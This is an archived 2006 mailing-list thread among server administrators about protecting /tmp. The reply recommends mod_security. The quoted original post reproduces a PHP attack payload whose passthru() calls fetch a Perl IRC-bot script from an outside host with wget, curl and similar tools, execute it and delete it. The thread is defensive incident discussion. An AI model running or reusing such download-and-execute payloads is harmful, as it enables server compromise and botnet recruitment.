Index: [Article Count Order] [Thread]

Date:  Mon, 11 Sep 2006 10:17:31 +0100
From:  "Paul Wilson - Swift Internet" <paulw (at mark) swiftinter.net>
Subject:  [coba-e:06820] Re: /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <02d301c6d583$260daba0$0e00a8c0 (at mark) office.swiftinter.net>
References:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
X-Mail-Count: 06820

Have you considered putting an application firewall on your box?

We installed mod_security on our servers - these attacks can then get 
bounced off. Providing you keep an eye open for new attack methods, you can 
then stay on top of it.

www.gotroot.com
www.modsecurity.org

Regards

Paul


----- Original Message ----- 
From: "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
To: <coba-e (at mark) bluequartz.org>
Sent: Saturday, September 09, 2006 9:44 PM
Subject: [coba-e:06808] /TMP Directory


> There was some discussion here lately about the security fix that stopped
> programs from running in /TMP.  Is this configured by default if you have
> your BQ Yum updated?  I got a DDOS today where the users were trying to 
> run
> the following program via PHP:
>
> <?
> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> v6.txt;rm -f v6*');
> passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/v6.txt;perl
> v6.txt;rm -f v6*');
> passthru('cd /tmp;lwp-download
> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> ?>
>
> The v6.txt is a Perl script that installs some IRC software and monitors 
> IRC
> on open ports.  I do not think the script was successful in running, but I
> just want to make sure the /TMP security is enabled where files can't be 
> run
> there.  While I don't think the DDOS attack was successful in running the
> script, it was successful in shutting down the serer due to MySQL becoming
> overwhelmed.  Server load was up to 156!
>
> Any suggestions would be appreciated.
>
> 


-- 
This message has been scanned for viruses and
dangerous content by Swift Internet, and is
believed to be clean.